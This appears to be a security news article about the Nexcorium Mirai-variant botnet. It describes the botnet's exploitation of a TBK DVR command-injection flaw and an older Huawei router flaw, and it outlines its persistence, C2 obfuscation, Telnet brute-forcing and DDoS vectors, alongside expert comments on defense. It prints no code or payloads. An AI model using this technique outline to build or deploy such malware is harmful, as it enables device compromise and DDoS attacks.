The IoT attack surface has never been larger—or more neglected.
This trend was captured by FortiGuard Labs, which tracked a campaign in which a Mirai-variant botnet (dubbed Nexcorium) exploits CVE-2024-3721. The command injection vulnerability found in TBK digital video recording devices ( DVR-4104 and DVR-4216) establishes persistent footholds across multiple Linux architectures.
These devices feature digital video recorders connected to surveillance feeds from CCTV cameras. The malware infection chain impacting the devices is notable less for its novelty than for its components:
- Staged downloader
- Obfuscated configuration
- Self-integrity checks
- Multiple distinct persistence mechanisms
These attributes combine to ensure that even a remediated device can remain compromised. “The Nexcorium campaign is a precise illustration of why automated scanning alone cannot close the exposure gap,” wrote Trey Ford, Chief Strategy and Trust Officer at Bugcrowd. “Machine speed analysis tells you a vulnerability exists, but human researcher depth tells you how an adversary will chain it, weaponize it, and sustain access long after the initial alert fires.”
Exploitable Infrastructures Often Overlooked
The Nexcorium campaign fingerprint—a custom HTTP header (X-Hacked-By: Nexus Team – Exploited By Erratic) suggests that a motivated, if not yet widely tracked, threat actor is operating with operational consistency. The campaign also illustrates a structural problem, not a tactical one.
Case in point…the botnet's arsenal includes a seven-year-old exploit for Huawei HG532 routers (CVE-2017-17215) alongside current credential-stuffing against default IoT passwords. This combination reflects the enduring reality of unpatched edge devices.
In addition, the botnet’s 10+ DDoS attack vectors—with a centralized command & control (C2) architecture as well as cross-architecture targeting—suggest an operator who is building capacity for coordinated campaigns at scale.
For organizations relying on aging surveillance hardware or unmanaged network-adjacent devices, Nexcorium reminds us of a key point: The most exploitable infrastructure is often the most overlooked.
Ideal Botnet Fodder
Physical hardware with DVR capability—like the TBR security cameras—presents several security vulnerabilities:
- Widespread deployments
- Chronic under-patching
- Common use of default credentials
- Network-adjacent positioning bypasses typical endpoint security coverage
Then there’s the gap between device ownership and active security management in enterprise and mid-market environments. It’s no wonder these IoT networks make for ideal botnet fodder.
Entry Point: The Nexcorium Infection Chain
As noted above, the Nexcorium infection chain features the threat-actor attribution artifact <X-Hacked-By: Nexus Team>. This custom HTTP header is a consistent operational signature.
For CVE-2024-3721, the OS command injection occurs via manipulated <mdb> and <mdc> arguments within specific network requests that call the TBK DVR devices. Hackers can then stage delivery via a <dvr> downloader script.
From there, hackers can retrieve multi-architecture payloads targeting a range of CPU architectures—including ARM, MIPS, and x86-64.
Built to Stay: Persistence Mechanisms and Evasion Design
To maintain a foothold on a compromised system, the Nexcorium campaign leverages a four-layer persistence strategy:
- Inittab modification
- rc.local startup script
- Systemd service creation
- Cron job scheduling
Self-integrity checking occurs via FNV-1a hash verification and automatic binary replication under alternate filenames. Forensic analysis and detection are further frustrated by post-persistence binary self-deletion.
Attack Capacity: DDoS Arsenal and C2 Coordination
The operational design of Nexcorium is consistent with a botnet-for-hire or coordinated disruption capability, not opportunistic infection. The ten distinct DDoS attack vectors include UDP flood, TCP SYN/ACK/PSH/URG floods, SMTP flood, and VSE query flood.
As Nexcorium attacks play out, a hard-coded credential wordlist targets default IoT and router passwords via Telnet brute-force. Using architecture detection logic enables hackers to achieve cross-platform propagation without manual retargeting.
Within the DDoS attacks, centralized command and control occurs via an XOR-decoded C2 domain cipher. The malicious server address is obfuscated within malware code and then decrypted at runtime to allow the malware to communicate with its controller. This enables on-demand attack orchestration.
“Enterprises have had their fleets of IoT and OT devices used by Mirai and its variants for some time, particularly for DDoS attacks,” noted John Gallagher, Vice President of Viakoo Labs. “Until more action is taken by enterprises to maintain cyber hygiene on IoT devices, this will continue because of the ease of infection and ability to move laterally.”
The Structural Lesson: How to Take on the Persistence Problem
The cybersecurity vulnerability age is a poor proxy for exploitation risk in unmanaged device categories. Continuous behavioral monitoring is a necessary complement to signature-based detection at the network edge. Only then can organizations account for the gap that exists for network-adjacent hardware outside traditional IT asset management scope.
“What organizations need is continuous adversarial testing that mirrors actual attacker behavior across the full asset inventory, including the devices that security teams have quietly placed out of scope,” said Ford. “While classically true of professional attackers, the next generation of security defense programs will be defined by how aggressively they test the edges, not just the crown jewels.”
Added Gallagher, “Security teams should make sure they have the right foundation for securing IoT devices. Traditional IT cybersecurity solutions don’t work for key functions like asset discovery and vulnerability remediation because they are agent-based. IoT devices don’t allow agents to be hosted on them, so only agentless discovery and remediation solutions can apply.”
